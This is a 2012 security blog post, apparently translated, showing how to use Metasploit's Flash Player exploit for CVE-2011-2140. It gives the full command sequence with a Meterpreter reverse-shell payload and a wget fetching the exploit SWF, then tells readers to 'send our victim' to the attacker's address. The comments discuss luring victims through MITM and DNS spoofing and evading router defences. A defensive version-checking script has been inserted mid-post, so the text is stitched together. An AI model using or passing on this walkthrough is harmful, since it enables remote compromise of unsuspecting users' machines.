ClsHack:Computer Security Blog    

[CVE-2011-2140 && Metasploit] Remote Code Execution in Flash Player


A new module has been added to Metasploit :D that exploits yet another bug in Flash Player.

The vulnerability is tracked as CVE-2011-2140; here are the details:

Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2417, and CVE-2011-2425.

Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
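The advisory text above gives the first fixed build for each product and platform, which is what a defender actually needs from it: a way to tell, from an inventory of installed Flash Player / AIR builds, which hosts are still exposed. The following is an added example (not code from the original post or from Metasploit) that encodes exactly those version thresholds and runs a comparison over a constructed inventory; the hostnames and versions in `SAMPLE_INVENTORY` are made up, and the handling of the `WIN 10,3,183,5` style string (the form Flash reports through its `$version` variable) is an assumption about input format, not something the post discusses.

```python
"""Flag Flash Player / AIR builds affected by CVE-2011-2140.

Added example, not part of the original post. The fixed versions below
are taken verbatim from the CVE description quoted in the post; any
product/platform pair the advisory does not mention is refused rather
than guessed.
"""
from typing import Iterable, List, Tuple

# (product, platform) -> first build that is NOT vulnerable, per the advisory.
FIXED_VERSIONS = {
    ("flash", "windows"): "10.3.183.5",
    ("flash", "macosx"): "10.3.183.5",
    ("flash", "linux"): "10.3.183.5",
    ("flash", "solaris"): "10.3.183.5",
    ("flash", "android"): "10.3.186.3",
    ("air", "windows"): "2.7.1",
    ("air", "macosx"): "2.7.1",
    ("air", "android"): "2.7.1.1961",
}

Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """Turn '10.3.183.5', '10,3,183,5' or 'WIN 10,3,183,5' into an int tuple.

    The comma form with a platform prefix is how Flash reports itself via
    the $version variable (assumption about input format).
    """
    token = text.strip().split()[-1].replace(",", ".")
    parts = token.split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a version string: {text!r}")
    return tuple(int(p) for p in parts)


def version_lt(a: Version, b: Version) -> bool:
    """Compare versions, padding with zeros so '2.7.1' equals '2.7.1.0'."""
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)) < b + (0,) * (n - len(b))


def is_vulnerable(product: str, platform: str, version: str) -> bool:
    """True if `version` is strictly below the advisory's fixed build."""
    key = (product.lower(), platform.lower())
    if key not in FIXED_VERSIONS:
        raise KeyError(f"advisory gives no fix data for {key}")
    return version_lt(parse_version(version), parse_version(FIXED_VERSIONS[key]))


def scan(inventory: Iterable[Tuple[str, str, str, str]]) -> List[str]:
    """Return the hosts whose (product, platform, version) is still exposed."""
    return [host for host, prod, plat, ver in inventory
            if is_vulnerable(prod, plat, ver)]


# Constructed sample inventory: hostnames and versions are invented.
SAMPLE_INVENTORY = [
    ("ws01", "flash", "windows", "10.3.183.5"),    # exactly the fixed build
    ("ws02", "flash", "windows", "10.3.181.34"),   # older, exposed
    ("ws03", "flash", "linux", "10.3.183.7"),      # newer than the fix
    ("mob01", "flash", "android", "10.3.185.25"),  # below 10.3.186.3, exposed
    ("ws04", "air", "windows", "2.7.0.19530"),     # below 2.7.1, exposed
    ("mob02", "air", "android", "2.7.1.1961"),     # exactly the fixed build
]

if __name__ == "__main__":
    for host in scan(SAMPLE_INVENTORY):
        print("vulnerable:", host)
```

Two details matter in practice: the comparison pads shorter version strings with zeros, so the advisory's `2.7.1` correctly covers a `2.7.0.x` build, and an inventory entry for a platform the advisory does not list (for example AIR on Linux) raises rather than silently reporting "not vulnerable".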

Let's see how to use Metasploit :D

The first thing to do is update Metasploit:
sudo msfupdate

Now we start Metasploit:
sudo msfconsole

We use the exploit:
use exploit/windows/browser/adobe_flash_sps

The commands are always the same :D
We set the payload:
set PAYLOAD windows/meterpreter/reverse_tcp
Configure the payload:
set LHOST MY_IP
Configure the exploit:
set URIPATH /

Now we set the player SWF, which I took from the Abysssec PoC:
wget http://www.clshack.it/nopaste/mediaplayer.swf
set SWF_PLAYER_URI mediaplayer.swf

We start the exploit:
msf exploit(adobe_flash_sps) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.190:4444
[*] Using URL: http://0.0.0.0:8080/J1YpA0
[*] Local IP: http://192.168.1.190:8080/J1YpA0
[*] Server started.
msf exploit(adobe_flash_sps) >

Have fun :D

We send our victim to our ip:PORT, and away we go :D

This entry was posted on Friday, February 10th, 2012 at 9:39 am and is filed under GNU/Linux, Hacking, Software.

  • Salzo

    Hello, but does this exploit work remotely?

    • Ac1d

      Excuse me, which part of Remote Code Execution do you not understand?

  • Anonymous

    But it is a client-side exploit; you must pass the link to the victim ;) 
    For example with an attack like http://www.clshack.com/?s=mitm

    • Simone formats

      So of course I have to get the victim's browser onto my ip with the port?
      A somewhat senseless attack :-D

      • Anonymous

        If you are on the local network, or you can do a MITM attack, exploit some XSS on different sites, and so on… it's foolish :D 

        • http://www.facebook.com/people/Giovanni-Colucci/1336991660 John Colucci

          Locally you could also run a DNS spoof… or am I wrong?

          • Anonymous

            You can do a simple spoof ;) 

        • Simone formats

          Well yes, of course, but you always have to get the victim to open the link to that address with the port to make it work…
          :-D

  • Zigfried Zorba

    This exploit didn't work with Windows XP SP3..

    • Anonymous

      Try updating :)

  • zacky

    But now modern routers stop MITM attacks and block the connection to the victim (it happens to me with the Vodafone Station, for example). What can you do to get around this?

    • Anonymous

      If you are not local, if you're remote, you must find another way to make the victim redirect to your NATed ip on the outside :) 

      • zacky

        Yes yes, I mean locally.. using ettercap, sometimes because of the internal protection of some routers (at least I think) the attack is not successful and the victim's traffic is blocked and they are no longer able to browse!! What can you do in these cases?

        • Anonymous

          I understand the problem; sometimes it's a problem in ettercap :D 

          I use scapy to do MITM and you'll find something about it here on the blog ;) Otherwise send the link to the victim :D 

          • zacky

            So I guess it's time to try and install it hehe ;)

          • zacky

            Tried it, but no way: my Vodafone Station spots the duplicated MAC and blocks the traffic :S

  • Unknownita

    I have a question: if I do a DNS spoof, for example by changing the DNS in the router and redirecting the victim's PC to the infected address, isn't that worse afterwards? Because every time the user types http://www.google.it they will end up on the infected site? Is there something more transparent? They will certainly realise that something is wrong..

    • Unknownita

      Perhaps a solution could be to direct them to a blank page of mine which then redirects to the actual site after a few seconds?
